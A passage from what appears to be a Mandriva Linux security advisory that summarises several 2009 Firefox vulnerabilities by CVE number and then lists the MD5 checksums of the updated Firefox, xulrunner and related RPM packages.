 Security researcher Marco C. reported a flaw in the parsing of regular
 expressions used in Proxy Auto-configuration (PAC) files. In certain
 cases this flaw could be used by an attacker to crash a victim's
 browser and run arbitrary code on their computer. Since this
 vulnerability requires the victim to have PAC configured in their
 environment with specific regular expresssions which can trigger
 the crash, the severity of the issue was determined to be moderate
 (CVE-2009-3372).
 
 Security research firm iDefense reported that researcher regenrecht
 discovered a heap-based buffer overflow in Mozilla's GIF image
 parser. This vulnerability could potentially be used by an attacker
 to crash a victim's browser and run arbitrary code on their computer
 (CVE-2009-3373).
 
 Mozilla security researcher moz_bug_r_a4 reported that the XPCOM
 utility XPCVariant::VariantDataToJS unwrapped doubly-wrapped objects
 before returning them to chrome callers. This could result in chrome
 privileged code calling methods on an object which had previously been
 created or modified by web content, potentially executing malicious
 JavaScript code with chrome privileges (CVE-2009-3374).
 
 Security researcher Gregory Fleischer reported that text within a
 selection on a web page can be read by JavaScript in a different domain
 using the document.getSelection function, violating the same-origin
 policy. Since this vulnerability requires user interaction to exploit,
 its severity was determined to be moderate (CVE-2009-3375).
 
 Mozilla security researchers Jesse Ruderman and Sid Stamm reported
 that when downloading a file containing a right-to-left override
 character (RTL) in the filename, the name displayed in the dialog
 title bar conflicts with the name of the file shown in the dialog
 body. An attacker could use this vulnerability to obfuscate the name
 and file extension of a file to be downloaded and opened, potentially
 causing a user to run an executable file when they expected to open
 a non-executable file (CVE-2009-3376).
 
 Mozilla upgraded several third party libraries used in media rendering
 to address multiple memory safety and stability bugs identified by
 members of the Mozilla community. Some of the bugs discovered could
 potentially be used by an attacker to crash a victim's browser and
 execute arbitrary code on their computer. liboggz, libvorbis, and
 liboggplay were all upgraded to address these issues (CVE-2009-3377,
 CVE-2009-3379, CVE-2009-3378).
 
 Mozilla developers and community members identified and fixed
 several stability bugs in the browser engine used in Firefox and
 other Mozilla-based products. Some of these crashes showed evidence
 of memory corruption under certain circumstances and we presume that
 with enough effort at least some of these could be exploited to run
 arbitrary code (CVE-2009-3380).
 
 Additionally, some packages which require so, have been rebuilt and
 are being provided as updates.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1563
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3274
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3370
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3371
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3372
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3373
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3374
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3375
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3376
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3377
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3378
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3379
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3380
 http://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.4
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2010.0:
 5de02057b925d2a7540fb7e1ef7bb58e  2010.0/i586/beagle-0.3.9-19.1mdv2010.0.i586.rpm
 865eb64b3d9edb5058b2cd6091a76b26  2010.0/i586/beagle-crawl-system-0.3.9-19.1mdv2010.0.i586.rpm
 80d4b43e92ab00663080cb3d03c01d08  2010.0/i586/beagle-doc-0.3.9-19.1mdv2010.0.i586.rpm
 fcd585d9f9f626053a08426aac2461ef  2010.0/i586/beagle-evolution-0.3.9-19.1mdv2010.0.i586.rpm
 a2449685a7248fbce0c362579a394078  2010.0/i586/beagle-gui-0.3.9-19.1mdv2010.0.i586.rpm
 2ca9f8a2bfeb574803bf9f599cef94da  2010.0/i586/beagle-gui-qt-0.3.9-19.1mdv2010.0.i586.rpm
 9fc8164351344251674264408e320cdc  2010.0/i586/beagle-libs-0.3.9-19.1mdv2010.0.i586.rpm
 c97703819ed2d81d61ce462b8387a8e3  2010.0/i586/epiphany-2.28.1-1.1mdv2010.0.i586.rpm
 65352aeee9a6611e1aaa2507aee6310f  2010.0/i586/epiphany-devel-2.28.1-1.1mdv2010.0.i586.rpm
 56e6935dd870279da4835c62e82e9824  2010.0/i586/epiphany-extensions-2.28.1-1.1mdv2010.0.i586.rpm
 636599b8e9ff5d069579f44db228bf53  2010.0/i586/firefox-3.5.4-0.1mdv2010.0.i586.rpm
 669ef8146179d7c082d305084cfd2821  2010.0/i586/firefox-af-3.5.4-0.1mdv2010.0.i586.rpm
 7e02a83877cd5783e64fe9647c5127cc  2010.0/i586/firefox-ar-3.5.4-0.1mdv2010.0.i586.rpm
 73ec239fbaf304b8bc82827457249939  2010.0/i586/firefox-be-3.5.4-0.1mdv2010.0.i586.rpm
 ead410c9f6e3f6377ce6de3bbda32bf1  2010.0/i586/firefox-bg-3.5.4-0.1mdv2010.0.i586.rpm
 32a3eaaf1beba37607c64f41f18bcbc3  2010.0/i586/firefox-bn-3.5.4-0.1mdv2010.0.i586.rpm
 2d5ee5d61e5cb6cd33a136a94499d222  2010.0/i586/firefox-ca-3.5.4-0.1mdv2010.0.i586.rpm
 e19a9e3564ccae55a454a1e69aa05568  2010.0/i586/firefox-cs-3.5.4-0.1mdv2010.0.i586.rpm
 ec525fa06852579aa7c487d707c82ae3  2010.0/i586/firefox-cy-3.5.4-0.1mdv2010.0.i586.rpm
 9d3c264145fc6779e460c3bc1e835eaf  2010.0/i586/firefox-da-3.5.4-0.1mdv2010.0.i586.rpm
 64e92b919e6b95a8767f918851e54caf  2010.0/i586/firefox-de-3.5.4-0.1mdv2010.0.i586.rpm
 20cecdc52af9590a5b45280527a6a703  2010.0/i586/firefox-devel-3.5.4-0.1mdv2010.0.i586.rpm
 e4ebb0fc55f84da2b523cfeed277f6fe  2010.0/i586/firefox-el-3.5.4-0.1mdv2010.0.i586.rpm
 bbee65d2c8c290254626c5a01136092b  2010.0/i586/firefox-en_GB-3.5.4-0.1mdv2010.0.i586.rpm
 0ed0007b43a472adaa9d15268ef0e22d  2010.0/i586/firefox-eo-3.5.4-0.1mdv2010.0.i586.rpm
 c2b311a8781b2decd7dbd1cbb8a0018f  2010.0/i586/firefox-es_AR-3.5.4-0.1mdv2010.0.i586.rpm
 5247e58309d1833229d509e044705fc5  2010.0/i586/firefox-es_ES-3.5.4-0.1mdv2010.0.i586.rpm
 a5dec68281f893658e5ac6695c8c4e59  2010.0/i586/firefox-et-3.5.4-0.1mdv2010.0.i586.rpm
 eb45f50d7c57ea62e63aba9c8df8cbb3  2010.0/i586/firefox-eu-3.5.4-0.1mdv2010.0.i586.rpm
 8b52f85f885db5d8bc80f62dee83bf1b  2010.0/i586/firefox-ext-beagle-0.3.9-19.1mdv2010.0.i586.rpm
 790b1ccafd787ce7ac8fb5ef022769d4  2010.0/i586/firefox-ext-blogrovr-1.1.804-6.1mdv2010.0.i586.rpm
 d6c45867a70152941b4e98709971a1ae  2010.0/i586/firefox-ext-foxmarks-2.7.2-2.1mdv2010.0.i586.rpm
 ffaf1990715b2667ad06d7d0da92c9a6  2010.0/i586/firefox-ext-mozvoikko-1.0-6.1mdv2010.0.i586.rpm
 51cfa5ee0b74ba1e1364dbb890f17059  2010.0/i586/firefox-ext-plasmanotify-0.3.0-6.1mdv2010.0.i586.rpm
 14184994a466647561caebf282868951  2010.0/i586/firefox-ext-r-kiosk-0.7.2-9.1mdv2010.0.i586.rpm
 05df49753c7be071e7fd30301f8e1e21  2010.0/i586/firefox-ext-scribefire-3.4.5-1.1mdv2010.0.i586.rpm
 8f7fa7986d9c2b782d239dbd5781477c  2010.0/i586/firefox-fi-3.5.4-0.1mdv2010.0.i586.rpm
 a2bcd0e119d154ba8e3e67894b2137d2  2010.0/i586/firefox-fr-3.5.4-0.1mdv2010.0.i586.rpm
 62bf45805a274ad09232a1c0d44e2a94  2010.0/i586/firefox-fy-3.5.4-0.1mdv2010.0.i586.rpm
 b01ad90d97640e1c99d8c6005f115d84  2010.0/i586/firefox-ga_IE-3.5.4-0.1mdv2010.0.i586.rpm
 34d7af747ccabd875dfcce48ad864fe9  2010.0/i586/firefox-gl-3.5.4-0.1mdv2010.0.i586.rpm
 008fc8b17095af333b493dae107cd71a  2010.0/i586/firefox-gu_IN-3.5.4-0.1mdv2010.0.i586.rpm
 087f2eda2fb46c58258a18a660868226  2010.0/i586/firefox-he-3.5.4-0.1mdv2010.0.i586.rpm
 ab0edfc6ffc3349bdc5a1a8c6aaa8b34  2010.0/i586/firefox-hi-3.5.4-0.1mdv2010.0.i586.rpm
 6fe05824fa866c0ee352d37c7bc346eb  2010.0/i586/firefox-hu-3.5.4-0.1mdv2010.0.i586.rpm
 bc1cd175b78a59bcdd6e55dffac9086f  2010.0/i586/firefox-id-3.5.4-0.1mdv2010.0.i586.rpm
 d45bffce0787f8d3afa52083ff63d4f9  2010.0/i586/firefox-is-3.5.4-0.1mdv2010.0.i586.rpm
 f6f9d47069c2a276c6ad234809fa6c13  2010.0/i586/firefox-it-3.5.4-0.1mdv2010.0.i586.rpm
 5fc95fca7b987a5996c4c74af61d0499  2010.0/i586/firefox-ja-3.5.4-0.1mdv2010.0.i586.rpm
 74911a09777dea47be4a69fd46700f15  2010.0/i586/firefox-ka-3.5.4-0.1mdv2010.0.i586.rpm
 0f7c75529ad3def515e546c3aa7e27e5  2010.0/i586/firefox-kn-3.5.4-0.1mdv2010.0.i586.rpm
 ae29bd59f6f93ef072ba3a2b08d63a89  2010.0/i586/firefox-ko-3.5.4-0.1mdv2010.0.i586.rpm
 468f7c938b7d771456e9b477653948ee  2010.0/i586/firefox-ku-3.5.4-0.1mdv2010.0.i586.rpm
 489d116d042bd5802f0068de9383c5d1  2010.0/i586/firefox-lt-3.5.4-0.1mdv2010.0.i586.rpm
 9be68106945017527a62c983031361e0  2010.0/i586/firefox-lv-3.5.4-0.1mdv2010.0.i586.rpm
 0f3175726b5d1994a37c7b035270e5d0  2010.0/i586/firefox-mk-3.5.4-0.1mdv2010.0.i586.rpm
 8b231f4d919586cf55990e026be6aecd  2010.0/i586/firefox-mn-3.5.4-0.1mdv2010.0.i586.rpm
 f981e93ff57a1e8472698ada26dd363f  2010.0/i586/firefox-mr-3.5.4-0.1mdv2010.0.i586.rpm
 8eadff91b007302e6ec3cdc2ec1241ba  2010.0/i586/firefox-nb_NO-3.5.4-0.1mdv2010.0.i586.rpm
 2841ff68c6d850220e4d8aaa062753a0  2010.0/i586/firefox-nl-3.5.4-0.1mdv2010.0.i586.rpm
 753237032819c85ab3b405bcf4082b5f  2010.0/i586/firefox-nn_NO-3.5.4-0.1mdv2010.0.i586.rpm
 193191bb1d7b43288584660f478d8b7b  2010.0/i586/firefox-oc-3.5.4-0.1mdv2010.0.i586.rpm
 408e98a77b5ad0a47dbf44f55dbd4077  2010.0/i586/firefox-pa_IN-3.5.4-0.1mdv2010.0.i586.rpm
 a782d15600b0466ab88c467ea7458721  2010.0/i586/firefox-pl-3.5.4-0.1mdv2010.0.i586.rpm
 52515a5f52bb6c46dca0b2003529a3e3  2010.0/i586/firefox-pt_BR-3.5.4-0.1mdv2010.0.i586.rpm
 81b6ce7fb332d0c32d4dcb1a60e43bea  2010.0/i586/firefox-pt_PT-3.5.4-0.1mdv2010.0.i586.rpm
 be670b306d4595c6095b04c86d2b4440  2010.0/i586/firefox-ro-3.5.4-0.1mdv2010.0.i586.rpm
 cfab5f72fc2f8985114fbe574b7e9ed3  2010.0/i586/firefox-ru-3.5.4-0.1mdv2010.0.i586.rpm
 3815771bf31f0df06d3c72a16c832273  2010.0/i586/firefox-si-3.5.4-0.1mdv2010.0.i586.rpm
 cdc811c47d76aa33712f24c93d40a0d7  2010.0/i586/firefox-sk-3.5.4-0.1mdv2010.0.i586.rpm
 862187e580b0a1b488b3dd924439f17b  2010.0/i586/firefox-sl-3.5.4-0.1mdv2010.0.i586.rpm
 f2cef85a6f4d9811e09b507026343190  2010.0/i586/firefox-sq-3.5.4-0.1mdv2010.0.i586.rpm
 99a3afc95764543f0ed81bfb89fc3231  2010.0/i586/firefox-sr-3.5.4-0.1mdv2010.0.i586.rpm
 a36788ab581f0a0e4b5ad679bb5b7106  2010.0/i586/firefox-sv_SE-3.5.4-0.1mdv2010.0.i586.rpm
 049a9e750fefc62ad61db53bf05ec6bd  2010.0/i586/firefox-te-3.5.4-0.1mdv2010.0.i586.rpm
 8d8ca3d39c424a56ef5b93d1e20dbde5  2010.0/i586/firefox-th-3.5.4-0.1mdv2010.0.i586.rpm
 7ee41c0c33da530f31fedd42f9534939  2010.0/i586/firefox-theme-kde4ff-0.14-18.1mdv2010.0.i586.rpm
 de5596d85162d52e2440e7e4f52b1b1c  2010.0/i586/firefox-tr-3.5.4-0.1mdv2010.0.i586.rpm
 902b0470dae73a54b7dc4406c76d91c9  2010.0/i586/firefox-uk-3.5.4-0.1mdv2010.0.i586.rpm
 33138d6a153bb4bcd0638255da2006a8  2010.0/i586/firefox-zh_CN-3.5.4-0.1mdv2010.0.i586.rpm
 acc67139d138e98d110c4aaa4ddbe8bb  2010.0/i586/firefox-zh_TW-3.5.4-0.1mdv2010.0.i586.rpm
 caee546f9710d7acdd6b816f951c5efd  2010.0/i586/gnome-python-extras-2.25.3-10.1mdv2010.0.i586.rpm
 53cc683aad8630f2052e4ebd965e5da2  2010.0/i586/gnome-python-gda-2.25.3-10.1mdv2010.0.i586.rpm
 55239ec23c37457cf9ef7744e9e311bc  2010.0/i586/gnome-python-gda-devel-2.25.3-10.1mdv2010.0.i586.rpm
 2c595010a046da1fa461c3e0cc6ad468  2010.0/i586/gnome-python-gdl-2.25.3-10.1mdv2010.0.i586.rpm
 7f4f7a400e54da7ea06baf5b8c12d399  2010.0/i586/gnome-python-gtkhtml2-2.25.3-10.1mdv2010.0.i586.rpm
 cba87f860c7a2bd9af64738e78f31b97  2010.0/i586/gnome-python-gtkmozembed-2.25.3-10.1mdv2010.0.i586.rpm
 3e12f0b123e58c0410c1bc9da1678ef6  2010.0/i586/gnome-python-gtkspell-2.25.3-10.1mdv2010.0.i586.rpm
 ed8ecee81e90e1b23924aca98960e67b  2010.0/i586/google-gadgets-common-0.11.1-2.1mdv2010.0.i586.rpm
 226f082af8f0dbc2b222e25b372fcfe4  2010.0/i586/google-gadgets-gtk-0.11.1-2.1mdv2010.0.i586.rpm
 e0e463fb97df0206a2ff3357e4f409d6  2010.0/i586/google-gadgets-qt-0.11.1-2.1mdv2010.0.i586.rpm
 0607442b0252c2f7ad89a88f407a1e18  2010.0/i586/libggadget1.0_0-0.11.1-2.1mdv2010.0.i586.rpm
 4c19a97a9d30ac6d6ed92c1914eb86a8  2010.0/i586/libggadget-dbus1.0_0-0.11.1-2.1mdv2010.0.i586.rpm
 308e97be73ba593653f207287f528702  2010.0/i586/libggadget-gtk1.0_0-0.11.1-2.1mdv2010.0.i586.rpm
 b1023ad523da8ba3d632367372052f5c  2010.0/i586/libggadget-js1.0_0-0.11.1-2.1mdv2010.0.i586.rpm
 fa694a3e378bd97ecae4fa8221e3ae45  2010.0/i586/libggadget-npapi1.0_0-0.11.1-2.1mdv2010.0.i586.rpm
 ec0a4dbf8e68baa45433ba293cff9fa7  2010.0/i586/libggadget-qt1.0_0-0.11.1-2.1mdv2010.0.i586.rpm
 4501a4d57a5eb5359c45271562845723  2010.0/i586/libggadget-webkitjs0-0.11.1-2.1mdv2010.0.i586.rpm
 5ecfe2a3534b50d08260dde62450cf18  2010.0/i586/libggadget-xdg1.0_0-0.11.1-2.1mdv2010.0.i586.rpm
 b0f8a03057d0409111366685dbb56a9c  2010.0/i586/libgoogle-gadgets-devel-0.11.1-2.1mdv2010.0.i586.rpm
 1ab5bc0b7b00823a5cdf815fac145245  2010.0/i586/libopensc2-0.11.9-1.1mdv2010.0.i586.rpm
 49dceab2ebd208914644be69f2915168  2010.0/i586/libopensc-devel-0.11.9-1.1mdv2010.0.i586.rpm
 43032aac7d930c8be3ad8547838b5da1  2010.0/i586/libxulrunner1.9.1.4-1.9.1.4-0.1mdv2010.0.i586.rpm
 e3fda1726c577c44abd17ed3e43aa37f  2010.0/i586/libxulrunner-devel-1.9.1.4-0.1mdv2010.0.i586.rpm
 5cb4ce59c5696e07d46a268b496ce1cc  2010.0/i586/mozilla-plugin-opensc-0.11.9-1.1mdv2010.0.i586.rpm
 404c94bb7ac9764b89986309b9e8b8b8  2010.0/i586/mozilla-thunderbird-beagle-0.3.9-19.1mdv2010.0.i586.rpm
 4695f41439abb22fff405ceea609718d  2010.0/i586/opensc-0.11.9-1.1mdv2010.0.i586.rpm
 769aea3fa1ecfe8fadc145f96595337f  2010.0/i586/python-xpcom-1.9.1.4-0.1mdv2010.0.i586.rpm
 d281a0a5bb6ee6989c3e6e5db9f5673c  2010.0/i586/xulrunner-1.9.1.4-0.1mdv2010.0.i586.rpm
 a4314cad9a7dbe6e98e3188c1af82c75  2010.0/i586/yelp-2.28.0-1.1mdv2010.0.i586.rpm 
 11002834e306ad2599e115787b57ece9  2010.0/SRPMS/beagle-0.3.9-19.1mdv2010.0.src.rpm
 f35067064a0c78edff8b036ca67774f3  2010.0/SRPMS/epiphany-2.28.1-1.1mdv2010.0.src.rpm
 bc04de1e6d7b2fd083a1206c4482fb7b  2010.0/SRPMS/epiphany-extensions-2.28.1-1.1mdv2010.0.src.rpm
 f0b0c517ec14c9d5e47647f9bf08fc78  2010.0/SRPMS/firefox-3.5.4-0.1mdv2010.0.src.rpm
 166554e926dcaab7ff2631817ee2b097  2010.0/SRPMS/firefox-ext-blogrovr-1.1.804-6.1mdv2010.0.src.rpm
 6432321af955bb76f1314dcf7598d4bd  2010.0/SRPMS/firefox-ext-foxmarks-2.7.2-2.1mdv2010.0.src.rpm
 0bfe93a46ccd200f974236740da44032  2010.0/SRPMS/firefox-ext-mozvoikko-1.0-6.1mdv2010.0.src.rpm
 912dabafc0eedd8374b77bf19863f8b4  2010.0/SRPMS/firefox-ext-plasmanotify-0.3.0-6.1mdv2010.0.src.rpm
 ef882f13ad9f95334e87b4e4d1d062c2  2010.0/SRPMS/firefox-ext-r-kiosk-0.7.2-9.1mdv2010.0.src.rpm
 8ecfa71225dd0500c8c4fdaaafe4fe22  2010.0/SRPMS/firefox-ext-scribefire-3.4.5-1.1mdv2010.0.src.rpm
 0df78b1b0f21b07d00706d72296490b3  2010.0/SRPMS/firefox-l10n-3.5.4-0.1mdv2010.0.src.rpm
 7a94ab5e7c21d73c1f8e074825fe93cd  2010.0/SRPMS/firefox-theme-kde4ff-0.14-18.1mdv2010.0.src.rpm
 a2906a74b07316a233c08eeaa09a827f  2010.0/SRPMS/gnome-python-extras-2.25.3-10.1mdv2010.0.src.rpm
 5ca44eee599e669d3936c2d8074dbdf1  2010.0/SRPMS/google-gadgets-0.11.1-2.1mdv2010.0.src.rpm
 3443a0354ae3c165243413cf2bd1a7dc  2010.0/SRPMS/opensc-0.11.9-1.1mdv2010.0.src.rpm
 e52f1e0b12809b71673467beef0e156f  2010.0/SRPMS/xulrunner-1.9.1.4-0.1mdv2010.0.src.rpm
 df7c1f2b4d6ee86a54319b934c717d39  2010.0/SRPMS/yelp-2.28.0-1.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 c4dd2bea9eef7bf7147588a55983cc3c  2010.0/x86_64/beagle-0.3.9-19.1mdv2010.0.x86_64.rpm
 611d637f1939cee8b3f25ff045410bed  2010.0/x86_64/beagle-crawl-system-0.3.9-19.1mdv2010.0.x86_64.rpm
 a3937170bf9b478cf52c5007d3456669  2010.0/x86_64/beagle-doc-0.3.9-19.1mdv2010.0.x86_64.rpm
 97440e5e123b4034e1c4bd66c903951c  2010.0/x86_64/beagle-evolution-0.3.9-19.1mdv2010.0.x86_64.rpm
 c3cb89e9c55dd3d09ecea0a1c8dead17  2010.0/x86_64/beagle-gui-0.3.9-19.1mdv2010.0.x86_64.rpm
 77ce56c06f51ffbbb180bd150e6526a8  2010.0/x86_64/beagle-gui-qt-0.3.9-19.1mdv2010.0.x86_64.rpm
 a8a8c984d22cf423677eaa06bf721a3c  2010.0/x86_64/beagle-libs-0.3.9-19.1mdv2010.0.x86_64.rpm
 de42c43851ee3fad1e9dd523676b4413  2010.0/x86_64/epiphany-2.28.1-1.1mdv2010.0.x86_64.rpm
 c992d4f71691f9b827d8411b089268b1  2010.0/x86_64/epiphany-devel-2.28.1-1.1mdv2010.0.x86_64.rpm
 239b64d2fa822a62d37b41e075ed29b5  2010.0/x86_64/epiphany-extensions-2.28.1-1.1mdv2010.0.x86_64.rpm
 8b532a94bb920ae17b87b30cd990025e  2010.0/x86_64/firefox-3.5.4-0.1mdv2010.0.x86_64.rpm
 058b94a3752d94a93ff7edfe5c6287e1  2010.0/x86_64/firefox-af-3.5.4-0.1mdv2010.0.x86_64.rpm
 19d57df8172a8d58349aa4e833bb4807  2010.0/x86_64/firefox-ar-3.5.4-0.1mdv2010.0.x86_64.rpm
 478d8d6ea0aba868ca1b4d388623d2ca  2010.0/x86_64/firefox-be-3.5.4-0.1mdv2010.0.x86_64.rpm
 d948d2f95b9952e9ce6226f32c2d45ca  2010.0/x86_64/firefox-bg-3.5.4-0.1mdv2010.0.x86_64.rpm
 508acd7ca804e502d2f21c81cff71987  2010.0/x86_64/firefox-bn-3.5.4-0.1mdv2010.0.x86_64.rpm
 200100baa6a85324cb59a0b5c4034cf0  2010.0/x86_64/firefox-ca-3.5.4-0.1mdv2010.0.x86_64.rpm
 f351af7e6a2987804878564e2bdb517f  2010.0/x86_64/firefox-cs-3.5.4-0.1mdv2010.0.x86_64.rpm
 b886d5ad21bd4f259abce9c72ca74530  2010.0/x86_64/firefox-cy-3.5.4-0.1mdv2010.0.x86_64.rpm
 937529a9d48a8421eb37fcd2dacfbf63  2010.0/x86_64/firefox-da-3.5.4-0.1mdv2010.0.x86_64.rpm
 5041b8cd1267706e1c74019df7245ffa  2010.0/x86_64/firefox-de-3.5.4-0.1mdv2010.0.x86_64.rpm
 ddad78036a99f8aa644147c52d4ab30d  2010.0/x86_64/firefox-devel-3.5.4-0.1mdv2010.0.x86_64.rpm
 d077816f443afb553cded01108542a81  2010.0/x86_64/firefox-el-3.5.4-0.1mdv2010.0.x86_64.rpm
 e295f0e12e20e80dd6d4cd7845988961  2010.0/x86_64/firefox-en_GB-3.5.4-0.1mdv2010.0.x86_64.rpm
 851fb3fe10a91c799575c19b30432df7  2010.0/x86_64/firefox-eo-3.5.4-0.1mdv2010.0.x86_64.rpm
 06aa7ac8447680a7f67fd49731cb2912  2010.0/x86_64/firefox-es_AR-3.5.4-0.1mdv2010.0.x86_64.rpm
 1c7a9e0342f736f22a305a29b2b17ca8  2010.0/x86_64/firefox-es_ES-3.5.4-0.1mdv2010.0.x86_64.rpm
 b8aa7b12e4d28bf80dd88471e3882beb  2010.0/x86_64/firefox-et-3.5.4-0.1mdv2010.0.x86_64.rpm
 29dec4973342d83c122ff48e22dbec14  2010.0/x86_64/firefox-eu-3.5.4-0.1mdv2010.0.x86_64.rpm
 4c76579a01ff2ffa1162b0650b36912f  2010.0/x86_64/firefox-ext-beagle-0.3.9-19.1mdv2010.0.x86_64.rpm
 29334af2ff1b753040090a0b93a0bf91  2010.0/x86_64/firefox-ext-blogrovr-1.1.804-6.1mdv2010.0.x86_64.rpm
 e4edb4283f8c13288fdd85b36b6dcfc5  2010.0/x86_64/firefox-ext-foxmarks-2.7.2-2.1mdv2010.0.x86_64.rpm
 b2b7ba697f7bb1806c41485c39c04262  2010.0/x86_64/firefox-ext-mozvoikko-1.0-6.1mdv2010.0.x86_64.rpm
 7f8dbdf8ab09c3ac1a219043d7b2c241  2010.0/x86_64/firefox-ext-plasmanotify-0.3.0-6.1mdv2010.0.x86_64.rpm
 2a8cc514420eaf1375f306417ea264fa  2010.0/x86_64/firefox-ext-r-kiosk-0.7.2-9.1mdv2010.0.x86_64.rpm
 dca7f6aede51ca5fe6913144d3ded0aa  2010.0/x86_64/firefox-ext-scribefire-3.4.5-1.1mdv2010.0.x86_64.rpm
 eb7527d596188d4b71e1f715c8909ae7  2010.0/x86_64/firefox-fi-3.5.4-0.1mdv2010.0.x86_64.rpm
 89bbfa9bb890007506f2adc9746a1995  2010.0/x86_64/firefox-fr-3.5.4-0.1mdv2010.0.x86_64.rpm
 b407524ae9d37866b31876ba7f33be96  2010.0/x86_64/firefox-fy-3.5.4-0.1mdv2010.0.x86_64.rpm
 d23825fd661749644c1ed2cc8f4cfd10  2010.0/x86_64/firefox-ga_IE-3.5.4-0.1mdv2010.0.x86_64.rpm
 cf8e596f053643a363b3e126dc8c11b3  2010.0/x86_64/firefox-gl-3.5.4-0.1mdv2010.0.x86_64.rpm
 04ee9bcb1f384c64638dfd7a91d4d5a7  2010.0/x86_64/firefox-gu_IN-3.5.4-0.1mdv2010.0.x86_64.rpm
 733afb9c93c3fc927dcdffe77f006537  2010.0/x86_64/firefox-he-3.5.4-0.1mdv2010.0.x86_64.rpm
 a9b8e240c8336ca0369d37d6f32ea468  2010.0/x86_64/firefox-hi-3.5.4-0.1mdv2010.0.x86_64.rpm
 3b5141d5592e0050822e1d09fb270c4d  2010.0/x86_64/firefox-hu-3.5.4-0.1mdv2010.0.x86_64.rpm
 71b9eaaca5847681a847a3bac4ef524f  2010.0/x86_64/firefox-id-3.5.4-0.1mdv2010.0.x86_64.rpm
 fe571af67b87fe2c1727967f556782bf  2010.0/x86_64/firefox-is-3.5.4-0.1mdv2010.0.x86_64.rpm
 0facab9a567c9dc25ae992d7dabd8ff4  2010.0/x86_64/firefox-it-3.5.4-0.1mdv2010.0.x86_64.rpm
 90ca903597fcf4dcabace089815be542  2010.0/x86_64/firefox-ja-3.5.4-0.1mdv2010.0.x86_64.rpm
 0503d174b8f8b5f3ccbd95ceea62ec49  2010.0/x86_64/firefox-ka-3.5.4-0.1mdv2010.0.x86_64.rpm
 1b296a68cd92389aad1dc8ae48e3eccd  2010.0/x86_64/firefox-kn-3.5.4-0.1mdv2010.0.x86_64.rpm
 60acc7bfc71ac9bed9c1e50f05a34e75  2010.0/x86_64/firefox-ko-3.5.4-0.1mdv2010.0.x86_64.rpm
 374cbbdb5f7ae83c1823fe4a83aade16  2010.0/x86_64/firefox-ku-3.5.4-0.1mdv2010.0.x86_64.rpm
 b20fd95c5c31ba12fbf1ed348aeb8e8e  2010.0/x86_64/firefox-lt-3.5.4-0.1mdv2010.0.x86_64.rpm
 34b732a363c4dc7ecd991d0951ad3aa6  2010.0/x86_64/firefox-lv-3.5.4-0.1mdv2010.0.x86_64.rpm
 16f9ef1afe6c2399d331b238cf8eb03f  2010.0/x86_64/firefox-mk-3.5.4-0.1mdv2010.0.x86_64.rpm
 c7f743f422e2409d222fa117ac291929  2010.0/x86_64/firefox-mn-3.5.4-0.1mdv2010.0.x86_64.rpm
 aa783ae7775d062c7358de7171da7994  2010.0/x86_64/firefox-mr-3.5.4-0.1mdv2010.0.x86_64.rpm
 71a0654691200f8d49d48a34687c7893  2010.0/x86_64/firefox-nb_NO-3.5.4-0.1mdv2010.0.x86_64.rpm
 8923eb8cff924e61e1d58a7f86ea82f4  2010.0/x86_64/firefox-nl-3.5.4-0.1mdv2010.0.x86_64.rpm
 ddabbf7813a196c86a9f12790f154530  2010.0/x86_64/firefox-nn_NO-3.5.4-0.1mdv2010.0.x86_64.rpm
 d51e459880c2cb8caebeed2f4b5f30a0  2010.0/x86_64/firefox-oc-3.5.4-0.1mdv2010.0.x86_64.rpm
 222288c908e4109cf20ebd1ba5051e2f  2010.0/x86_64/firefox-pa_IN-3.5.4-0.1mdv2010.0.x86_64.rpm
 343a3e700320b1e8b013875e1c963764  2010.0/x86_64/firefox-pl-3.5.4-0.1mdv2010.0.x86_64.rpm
 f4acf1e3094834b9e8b8730e5781e3d2  2010.0/x86_64/firefox-pt_BR-3.5.4-0.1mdv2010.0.x86_64.rpm
 7274cc1214199d7504210c8283df1343  2010.0/x86_64/firefox-pt_PT-3.5.4-0.1mdv2010.0.x86_64.rpm
 aa662296263be468521bf537557b21f0  2010.0/x86_64/firefox-ro-3.5.4-0.1mdv2010.0.x86_64.rpm
 716aca0c4ae31eb610117109497a444d  2010.0/x86_64/firefox-ru-3.5.4-0.1mdv2010.0.x86_64.rpm
 3ace8ea20d892d1dbed78dde6b6b94e9  2010.0/x86_64/firefox-si-3.5.4-0.1mdv2010.0.x86_64.rpm
 ade098bb6c3f1dd2f5b09b0af46d3551  2010.0/x86_64/firefox-sk-3.5.4-0.1mdv2010.0.x86_64.rpm
 23e1fbbc0f7ea19abe452732769d2ff5  2010.0/x86_64/firefox-sl-3.5.4-0.1mdv2010.0.x86_64.rpm
 026f1d875f1a6339c62851548cf1cfec  2010.0/x86_64/firefox-sq-3.5.4-0.1mdv2010.0.x86_64.rpm
 fdd0e6a5269d98828c5cf59115aa4e11  2010.0/x86_64/firefox-sr-3.5.4-0.1mdv2010.0.x86_64.rpm
 2da145818827001b2ea9fd31b68c3468  2010.0/x86_64/firefox-sv_SE-3.5.4-0.1mdv2010.0.x86_64.rpm
 a181ab420d1c61abb1ab7955588c15d3  2010.0/x86_64/firefox-te-3.5.4-0.1mdv2010.0.x86_64.rpm
 3710e05ba538afdbc3630173e384ea94  2010.0/x86_64/firefox-th-3.5.4-0.1mdv2010.0.x86_64.rpm
 6664e778689cfcd1eceee54649ee1f31  2010.0/x86_64/firefox-theme-kde4ff-0.14-18.1mdv2010.0.x86_64.rpm
